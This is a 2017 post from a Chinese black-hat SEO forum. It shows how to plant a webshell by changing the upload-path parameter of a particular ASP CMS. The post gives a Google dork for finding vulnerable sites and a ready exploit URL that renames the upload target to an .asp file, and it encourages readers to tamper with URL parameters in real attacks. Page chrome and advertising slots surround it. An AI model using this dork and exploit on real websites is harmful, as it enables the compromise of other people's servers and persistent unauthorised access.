黑帽SEO技术论坛|商业源码|棋牌资源网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
查看: 50|回复: 0

修改url的参数进行突破上传限制拿webshell

[复制链接]

1320

主题

1322

帖子

4015

积分

超级版主

Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18

积分
4015
发表于 2017-3-3 18:45:25 | 显示全部楼层 |阅读模式

大家可能都看见过这样的漏洞,这里以疯子的嘉友科技cms上传漏洞为例。

谷歌关键字:inurl:newslist.asp?NodeCode=

exp:
http://www.yunsec.netadmin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上传目录是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出对参数PicPath进行了修改,这种漏洞主要是存在文件名或者路径过滤不严,在实战中多多观察url中的参数,可以尝试进行修改数据


回复

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|黑帽SEO技术论坛|商业源码|棋牌资源网  |网站地图

Powered by Discuz! X3.3© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表